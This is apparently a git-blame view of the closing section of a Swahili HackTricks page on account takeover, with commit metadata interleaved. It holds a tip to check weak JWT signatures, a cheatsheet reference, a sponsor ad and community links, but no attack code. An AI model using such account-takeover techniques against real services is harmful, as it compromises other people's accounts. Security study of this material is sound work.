			`* Angalia saini dhaifu ya JWT`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
			`{% content-ref url="hacking-jwt-json-web-tokens.md" %}`
			`[hacking-jwt-json-web-tokens.md](hacking-jwt-json-web-tokens.md)`
			`{% endcontent-ref %}`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Marejeo`
GitBook: [#2870] update 2021-11-30 00:17:48 +00:00
			`* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00
			`## WhiteIntel`

			`<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>`

			`[WhiteIntel](https://whiteintel.io) ni injini ya utaftaji inayotumia dark-web ambayo inatoa utendaji wa bure kuchunguza ikiwa kampuni au wateja wake wameathiriwa na malware za wizi.`

			`Lengo kuu la WhiteIntel ni kupambana na kuchukua akaunti na mashambulio ya ransomware yanayotokana na programu hasidi ya wizi wa habari.`

			`Unaweza kutembelea tovuti yao na kujaribu injini yao bure hapa:`

			`{% embed url="https://whiteintel.io" %}`


Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Njia nyingine za kusaidia HackTricks:`
a 2024-02-03 14:45:32 +00:00
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:38:36 +00:00			`* Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia [MIPANGO YA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
			`* Pata [bidhaa rasmi za PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Gundua [Familia ya PEASS](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) za kipekee`
			`* Jiunge na 💬 [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au kikundi cha [telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`